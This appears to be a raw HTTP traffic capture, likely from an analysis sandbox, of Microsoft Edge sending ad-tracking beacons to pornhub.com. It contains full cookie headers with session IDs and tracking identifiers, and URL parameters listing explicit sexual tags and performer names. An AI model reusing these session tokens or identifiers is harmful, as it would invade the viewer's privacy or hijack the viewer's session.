cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:31 GMT
content-type: application/json; charset=utf-8
x-frame-options: SAMEORIGIN
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=thirdQuartile&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=thirdQuartile&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:32 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=pause&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=pause&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:35 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=video_complete&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=video_complete&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:35 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A30781%7D%5D%7D%5D&clientType=mobile&channel[site]=pornhub&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&device_type=tablet&site_id=2&dm=www.pornhub.com%2F_xa&_=1728144283145&noc=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A30781%7D%5D%7D%5D&clientType=mobile&channel[site]=pornhub&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&device_type=tablet&site_id=2&dm=www.pornhub.com%2F_xa&_=1728144283145&noc=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:44 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
set-cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:43 GMT; Secure
set-cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:43 GMT; Secure
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_pixel?info=CiQ5ZjgyNGRlMy1lOWRiLTRhMTYtYmMwYy1kNGU3YmNmMDgxMzUQm8eFuAYaIjcyNGJmMmE0ZjczNzRjMjNiM2FhOTIzNDBiZTZlMGNiLTEoATC98AE4vfABSL%2BnzOEDUgEyWJf4kN0DYLmOjf4DciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EB%2FKnx0k1iMD%2BSAQJOTKoB9AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGhkIHBvcm4saW4gdGhlIGFzcyxwb3Juc3RhcixyZWFsaXR5LHJpZGluZyBkaWNrLHJ5YW4gcnlkZXIsc3Vja2luZyBkaWNrygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzUyNogCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgC5ebHjgfgAr2s1KcE8gIkZWQ0NGFkMDgtZjg5YS1hMDZlLTBhOWEtZGIwNzhjZDcyOWQx%2BgIBMYIDjgF7ImFjdG9yX2lkIjo1NzAwNjYxLCJjb250ZW50X3R5cGUiOiJwYXJ0bmVyIiwidmlkZW9faWQiOjQ1NzgwOTA5MSwiaGFzaCI6ImM2OTk2MzI4NWY5ZjRmZDg1MTdiNDhjOWIzZjg3MTI3Iiwic2Vzc2lvbl9pZCI6IjQxODg5MDc0MzkwMTY5NjAyMCJ9kgMHZGVza3RvcJoDAmVuwgMFdmlkZW%2BSBA9TZW5zZW1ha2VycyBCLlaoBAGyBAMDAgHSBALkBdgEGQ%3D%3D&noc=0&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

msedge.exe

Remote address:

66.254.114.41:443

Request

